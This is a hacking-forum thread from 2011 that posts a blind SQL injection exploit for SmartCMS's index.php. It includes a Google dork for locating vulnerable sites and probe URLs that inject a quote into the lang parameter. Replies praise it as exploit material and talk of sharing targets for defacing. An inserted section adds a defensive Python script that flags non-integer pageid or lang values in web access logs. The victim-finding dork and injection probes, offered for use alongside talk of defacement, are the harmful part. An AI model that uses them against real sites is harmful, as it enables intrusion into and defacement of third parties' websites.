Chibi Cyber - Komunitas Cyber Indonesia

Full Version: Sql Injection Vulnerability
# Exploit Title: SmartCMS (index.php) Blind Sql Injection Vulnerability
# Author: Angel Injection
# home Page: [You must be Register or Login to see this link.]
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link: www.smartwebsites.com.cy
# Version: N/A
# Category: webapps
# Google dork: intext:"powered by SmartCMS" inurl:index.php?pageid=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Exploit

http://localhost/ind...pageid=1&lang=1'

http://localhost/ind...pageid=1&lang=1[blind here]



Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq, Club Hack Team

@ Eastjavahacker Team 2011

If you consider yourself a newbie, you must comment
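
Added example, not part of the original post and not SmartCMS code: a defender-side scan of web access logs for requests to index.php whose pageid or lang value is not a plain integer, which is what the probe URL above looks like in a log. It assumes both parameters are meant to be integers (as in pageid=1&lang=1) and a combined-format access log; the log lines and helper names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: pageid and lang are plain integers, as in the post's pageid=1&lang=1.
NUMERIC_PARAMS = ("pageid", "lang")
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Jul/2011:11:20:01 +0700] "GET /index.php?pageid=1&lang=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [31/Jul/2011:11:21:14 +0700] "GET /index.php?pageid=1&lang=1%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.9 - - [31/Jul/2011:11:21:40 +0700] "GET /index.php?pageid=1%27&lang=1 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.4 - - [31/Jul/2011:11:25:02 +0700] "GET /index.php?pageid=3&lang=2 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
198.51.100.4 - - [31/Jul/2011:11:25:09 +0700] "GET /style.css?lang=en HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def non_numeric_params(target):
    """Return {param: decoded value} for pageid/lang values that are not integers."""
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return {}
    # parse_qs URL-decodes values, so %27 is compared as a literal quote.
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"\d{1,9}", value):
                bad[name] = value
    return bad


def scan(log_text):
    """Return (line number, client IP, offending params) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line this pattern understands
        bad = non_numeric_params(match.group("target"))
        if bad:
            findings.append((lineno, match.group("ip"), bad))
    return findings


if __name__ == "__main__":
    for lineno, ip, bad in scan(SAMPLE_LOG):
        print(f"line {lineno}: {ip} sent non-integer parameter(s) {bad}")
```

The same allow-list (digits only) is what the application itself should enforce on these two parameters before they reach a query.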
(07-31-2011 11:34 AM) donyprasetya Wrote: # Exploit Title: SmartCMS (index.php) Blind Sql Injection Vulnerability
Nice info, bro. I'm always looking for exploits, especially for SQLi. Thanks, thanks!
Sharing some targets for those who like defacing

It turns out there is already a tutorial for the injection here
[You must be Register or Login to see this link.]
And there is also a manual method, such as
[You must be Register or Login to see this link.]
That's all from me; sorry if anything is wrong